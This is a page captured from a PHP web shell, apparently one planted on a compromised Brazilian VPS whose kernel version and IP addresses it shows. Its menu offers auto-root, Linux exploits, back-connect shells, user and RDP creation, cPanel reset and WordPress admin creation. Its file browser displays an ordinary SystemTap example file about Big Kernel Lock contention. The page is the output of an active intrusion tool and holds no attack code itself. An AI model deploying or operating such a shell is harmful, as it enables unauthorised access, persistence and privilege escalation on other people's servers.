Linux vps-4302913.novaexata.com.br 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64
Apache
: 162.214.88.42 | : 216.73.216.156
166 Domain
7.3.33
wwnova
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
systemtap /
examples /
locks /
[ HOME SHELL ]
Name
Size
Permission
Action
bkl.meta
1.08
KB
-rw-r--r--
bkl.stp
2.07
KB
-rwxr-xr-x
bkl_stats.meta
977
B
-rw-r--r--
bkl_stats.stp
2.11
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bkl.meta
title: Tracing Contention on Big Kernel Lock name: bkl.stp version: 1.1 keywords: locking subsystem: locking author: Flavio Leitner status: production exit: user-controlled output: trace scope: system-wide description: The bkl.stp script can help determine whether the Big Kernel Lock (BKL) is causing serialization on a multiprocessor system due to excessive contention of the BKL. The bkl.stp script takes two arguments. The first one is optional, and used to enable backtraces, and print them once a process has been holding the BKL for a user specified number of nseconds is reached. The second option is compulsory and is the number of processes waiting for the Big Kernel Lock (BKL). When the number of processes waiting for the BKL is reached or exceeded, the script will print a time stamp, the number of processes waiting for the BKL, the holder of the BKL, and the amount of time the BKL was held. If backtraces are enabled, a backtrace will be printed as well. test_support: stap -l 'kernel.function("lock_kernel").return' test_check: stap -p4 bkl.stp 1 test_installcheck: stap bkl.stp -T 1 1
Close